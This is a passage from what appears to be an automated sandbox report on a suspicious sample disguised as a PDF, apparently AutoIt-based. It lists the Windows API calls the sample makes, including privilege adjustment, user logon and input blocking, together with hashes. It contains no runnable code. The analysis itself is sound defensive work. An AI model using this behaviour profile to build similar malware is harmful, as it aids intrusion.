                                    • Instruction Fuzzy Hash: 1DE0863155D77238B95424197C0AEB7138D8B12271B14028BF990D92D5DE99188655A9
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0101C966
                                    • FindClose.KERNEL32(00000000), ref: 0101C996
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: d323b846882291b2c677b6157ca6c688f6a6a10fc2844a7cbded9bbb23f59c6f
                                    • Instruction ID: b15b13e172cfbf01a66e050ed4dfce693cd47b31acf52e5049a8521501673c56
                                    • Opcode Fuzzy Hash: d323b846882291b2c677b6157ca6c688f6a6a10fc2844a7cbded9bbb23f59c6f
                                    • Instruction Fuzzy Hash: 4D11A1326042019FDB10EF29D848A6AF7E9FF85324F00851EF9A9D7291DB78AC00CF81
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0102977D,?,0103FB84,?), ref: 0101A302
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0102977D,?,0103FB84,?), ref: 0101A314
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 7316fdb836ccda3c6131833f975867e1bd55f41f265bd905cd577a5e78842f7a
                                    • Instruction ID: 61a9dee7d35606c937775fbb9c4d72b78c88d1ca84ffce1f2371800dfa89bf63
                                    • Opcode Fuzzy Hash: 7316fdb836ccda3c6131833f975867e1bd55f41f265bd905cd577a5e78842f7a
                                    • Instruction Fuzzy Hash: 56F0E23160522DEBDB20AEA5CC48FEA736CBF08361F008155F848D3181D6749900CBE1
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01008851), ref: 01008728
                                    • CloseHandle.KERNEL32(?,?,01008851), ref: 0100873A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 3731b98cd60e270563fcf4dc2434abcd8374c62839ff9f21dab785bb612942b8
                                    • Instruction ID: c556581dfd3e7b99a5c8d2932047a91d61c72dc4172db948db4de9e1506fd31f
                                    • Opcode Fuzzy Hash: 3731b98cd60e270563fcf4dc2434abcd8374c62839ff9f21dab785bb612942b8
                                    • Instruction Fuzzy Hash: 44E0B676410611EFE7363B64FD09D77BBEEFB04350B14882AF59A80474DB66AC90EB10
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FD8F97,?,?,?,00000001), ref: 00FDA39A
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FDA3A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 6ee60dc78479c66fb31e9d67486c6114509427a938d23cf4a4ddec0e828a614b
                                    • Instruction ID: 910a67c1ed4702fdc1299d7f7fb85715af691eeba3571fe2a02daa7a4a5aa02b
                                    • Opcode Fuzzy Hash: 6ee60dc78479c66fb31e9d67486c6114509427a938d23cf4a4ddec0e828a614b
                                    • Instruction Fuzzy Hash: 2FB0923145420AABCA102B91E809B8A3F6CEB45AA2F408010F64D85054CBE754508B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5faa9d4f6fcef598726002b9f50658c617e4daa119ba608f1b0524c8ed027731
                                    • Instruction ID: 421395ad895e72d20ddf01799920ed03dfb9dd48855c1588fbce2a09c428b81e
                                    • Opcode Fuzzy Hash: 5faa9d4f6fcef598726002b9f50658c617e4daa119ba608f1b0524c8ed027731
                                    • Instruction Fuzzy Hash: 85325676D29F014ED7239534D972335B249AFB73D4F18DB37E81AB5A9AEB29C4831200
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c2491a5163dc8d85bbf3049c00523b0f7065a8786de7eb69b2990cc907622dcb
                                    • Instruction ID: daa44041652b848dd087351f6d4f890f4d49d495c0db5268f064be19197bd122
                                    • Opcode Fuzzy Hash: c2491a5163dc8d85bbf3049c00523b0f7065a8786de7eb69b2990cc907622dcb
                                    • Instruction Fuzzy Hash: 44B1FD74E6AF418ED22396398961336B64CAFBB2C6B51D71BFC6731D16FB2681834240
                                    APIs
                                    • __time64.LIBCMT ref: 01018B25
                                      • Part of subcall function 00FD543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,010191F8,00000000,?,?,?,?,010193A9,00000000,?), ref: 00FD5443
                                      • Part of subcall function 00FD543A: __aulldiv.LIBCMT ref: 00FD5463
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    • Opcode ID: 35f2e601d53d3123ba0348cb43460f220dc9d9a68ab589d3c38d3f91f960ad66
                                    • Instruction ID: 3adeefe23dee45482a2cc7445ea5ec49eec5e309e4d645cfa4fb6d961db9dcd5
                                    • Opcode Fuzzy Hash: 35f2e601d53d3123ba0348cb43460f220dc9d9a68ab589d3c38d3f91f960ad66
                                    • Instruction Fuzzy Hash: AA21B172A35610CBC729CF29D441A52B3E1EBA5321B288E6DD0E5CB2C4CA79B905CB94
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 01024218
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: af4b4c04c7bb2ad310ea21b85a515c3900f017737c07b5116db11a902c218758
                                    • Instruction ID: 35afacce178d7b63dfb1fcafad1affc5b5596f86f1093b88e5d8ee77185b5fba
                                    • Opcode Fuzzy Hash: af4b4c04c7bb2ad310ea21b85a515c3900f017737c07b5116db11a902c218758
                                    • Instruction Fuzzy Hash: BBE04F712442159FC710EF6AD844A9AFBECAF99760F008016FD8DD7353DAB4E8449BA1
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,010088D1), ref: 01008CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    • Opcode ID: 624c09b0783eb00a9836213dc5724cdb86da994297a4eac2107d77cf3182f3ec
                                    • Instruction ID: 2845407d9db0b3e409ba59a2f82432e17ef5742b7f0bef3124fa1e67cedd19a1
                                    • Opcode Fuzzy Hash: 624c09b0783eb00a9836213dc5724cdb86da994297a4eac2107d77cf3182f3ec
                                    • Instruction Fuzzy Hash: 16D05E3226450EABEF018EA8DC01EAE3B69EB04B01F408111FE15C5090C776D835AF60
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 00FF2242
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 972a0c3946a2d75561e3f07ee19587cb8d29393acc688df281a0beb027388891
                                    • Instruction ID: 101ef8f3a812ad4b43f77acefa5024f0986e55bfd926829714557898a2886b72
                                    • Opcode Fuzzy Hash: 972a0c3946a2d75561e3f07ee19587cb8d29393acc688df281a0beb027388891
                                    • Instruction Fuzzy Hash: 02C002B1804109DBDB15DA90D5889EAB7BCAB04304F104195A641A2100D6749B449A61
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FDA36A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 0f906fef6510d2ad785d9f7a095612f8f0a6a1baa7975b1acea722e79e221bad
                                    • Instruction ID: b38d0f33fc710034158459209b1c57c3138aa0f88e1a3fe001782467ac026eb1
                                    • Opcode Fuzzy Hash: 0f906fef6510d2ad785d9f7a095612f8f0a6a1baa7975b1acea722e79e221bad
                                    • Instruction Fuzzy Hash: 24A0243000010DF7CF001F41FC044457F5CD7011D0700C010F40C41011C7F3541047C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b9e461e0c9526c6c9f3123e4a87fec82be0c342d75ce4e415aaa6b670b5cc04c
                                    • Instruction ID: d6745e36cc228c06cfb016741a707d01174f16ada8af772600bc459c6e8b4d6b
                                    • Opcode Fuzzy Hash: b9e461e0c9526c6c9f3123e4a87fec82be0c342d75ce4e415aaa6b670b5cc04c
                                    • Instruction Fuzzy Hash: 25223930901217DBEF29CA18C9D1B7D7BA1FB45394F24846ED8869B2D1DB349D82EF60
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction ID: f910cd9ec675c69866f185fbfdb4d69c9dccbe7b4cc83a29c71472aa19bd6715
                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction Fuzzy Hash: 77C1833260515309DB6D8639947413EBBE36AA27B131E0B5FE4B2CB6C5EF20D524F660
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction ID: d89d41788b512d8fd8964d9c2bfd98a9a7733162f4ca85d04d3d4aa0e19ed2fa
                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction Fuzzy Hash: D6C1943260519309DB6D4739947413EBBE36AA27B131E0B6FE4B2DB6C4EF20D524F660
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: 5f2e366d2edf823ce050804c3886bbc54320e37b55714a2eaa89db82b6312d54
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: 68C1623270519319DB2D4739947417EBBE36AA27B131E0B5EE4B2CB6D4EF20D524F610
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 01027B70
                                    • DeleteObject.GDI32(00000000), ref: 01027B82
                                    • DestroyWindow.USER32 ref: 01027B90
                                    • GetDesktopWindow.USER32 ref: 01027BAA
                                    • GetWindowRect.USER32(00000000), ref: 01027BB1
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 01027CF2
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 01027D02
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027D4A
                                    • GetClientRect.USER32(00000000,?), ref: 01027D56
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01027D90
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DB2
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DC5
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DD0
                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DD9
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DE8
                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DF1
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DF8
                                    • GlobalFree.KERNEL32(00000000), ref: 01027E03
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027E15
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01042CAC,00000000), ref: 01027E2B
                                    • GlobalFree.KERNEL32(00000000), ref: 01027E3B
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01027E61
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01027E80
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027EA2
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0102808F
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: f6292bf4184180047b15a8aec236a62deb117212c84a7af0d472528b405ea030
                                    • Instruction ID: 61557f81ed56a75cd2a685fdb4a3a83648b363c2c5bda9ac371a9932e2ee8d56
                                    • Opcode Fuzzy Hash: f6292bf4184180047b15a8aec236a62deb117212c84a7af0d472528b405ea030
                                    • Instruction Fuzzy Hash: E0028F71900119EFDB24DFA8CC89EAE7BB9FB48310F148159FA45AB295CB75AD01CF60
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,0103F910), ref: 010338AF
                                    • IsWindowVisible.USER32(?), ref: 010338D3
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharUpperVisibleWindow
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 4105515805-45149045
                                    • Opcode ID: d4257cff2c2e9b5248abb74e38726b5be623e3a7102bec05884dddde029fe1f9
                                    • Instruction ID: 449bc2692965a23e6e585448c002b9be082c3fad7fc85ba3c36e81416128b5e8
                                    • Opcode Fuzzy Hash: d4257cff2c2e9b5248abb74e38726b5be623e3a7102bec05884dddde029fe1f9
                                    • Instruction Fuzzy Hash: DFD160702043069BDB14EF25C891AAE7BEABF94354F044459B9C69F3E2CF35E90ACB41
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0103A89F
                                    • GetSysColorBrush.USER32(0000000F), ref: 0103A8D0
                                    • GetSysColor.USER32(0000000F), ref: 0103A8DC
                                    • SetBkColor.GDI32(?,000000FF), ref: 0103A8F6
                                    • SelectObject.GDI32(?,?), ref: 0103A905
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0103A930
                                    • GetSysColor.USER32(00000010), ref: 0103A938
                                    • CreateSolidBrush.GDI32(00000000), ref: 0103A93F
                                    • FrameRect.USER32(?,?,00000000), ref: 0103A94E
                                    • DeleteObject.GDI32(00000000), ref: 0103A955
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0103A9A0
                                    • FillRect.USER32(?,?,?), ref: 0103A9D2
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0103A9FD
                                      • Part of subcall function 0103AB60: GetSysColor.USER32(00000012), ref: 0103AB99
                                      • Part of subcall function 0103AB60: SetTextColor.GDI32(?,?), ref: 0103AB9D
                                      • Part of subcall function 0103AB60: GetSysColorBrush.USER32(0000000F), ref: 0103ABB3
                                      • Part of subcall function 0103AB60: GetSysColor.USER32(0000000F), ref: 0103ABBE
                                      • Part of subcall function 0103AB60: GetSysColor.USER32(00000011), ref: 0103ABDB
                                      • Part of subcall function 0103AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0103ABE9
                                      • Part of subcall function 0103AB60: SelectObject.GDI32(?,00000000), ref: 0103ABFA
                                      • Part of subcall function 0103AB60: SetBkColor.GDI32(?,00000000), ref: 0103AC03
                                      • Part of subcall function 0103AB60: SelectObject.GDI32(?,?), ref: 0103AC10
                                      • Part of subcall function 0103AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0103AC2F
                                      • Part of subcall function 0103AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0103AC46
                                      • Part of subcall function 0103AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0103AC5B
                                    Memory Dump Source
